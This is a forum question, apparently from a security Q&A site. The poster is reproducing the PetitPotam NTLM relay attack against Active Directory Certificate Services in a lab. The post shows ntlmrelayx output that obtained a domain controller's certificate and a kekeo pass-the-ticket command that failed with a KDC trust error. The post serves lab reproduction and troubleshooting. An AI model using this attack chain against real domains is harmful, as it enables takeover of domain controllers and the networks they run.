active directory – Trying to reproduce petitpotam exploit, got “KDC_ERROR_CLIENT_NOT_TRUSTED (62)” error

I’m following this article to reproduce the EFS bug: https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/

My environment:

  1. Windows 2016 AD (Hostname: W2016$)
  2. Windows 2016 SRV01 (Running AD CS service)
  3. Windows 2016 SRV02 (Attack machine)

I’ve successfully generated the certificate with ntlmrelayx

(*) Skipping user W2016$ since attack was already performed
(*) GOT CERTIFICATE!
(*) Base64 certificate of user W2016$:
...

Then I logged in to SRV02 with a low privilege user. When I pass the ticket in kekeo, it results in KDC_ERROR_CLIENT_NOT_TRUSTED error:

# tgt::ask /pfx:xxx /user:W2016$ /domain:corp.aaron.com /ptt
...

Realm        : corp.xx.com (corp)
User         : W2016$ (W2016$)
CName        : W2016$   (KRB_NT_PRINCIPAL (1))
SName        : krbtgt/corp.xx.com    (KRB_NT_SRV_INST (2))
Need PAC     : Yes
Auth mode    : RSA
(kdc) name: W2016.corp.xx.com (auto)
(kdc) addr: 172.16.177.130 (auto)
KDC_ERROR_CLIENT_NOT_TRUSTED (62)

Does anyone know what’s wrong here?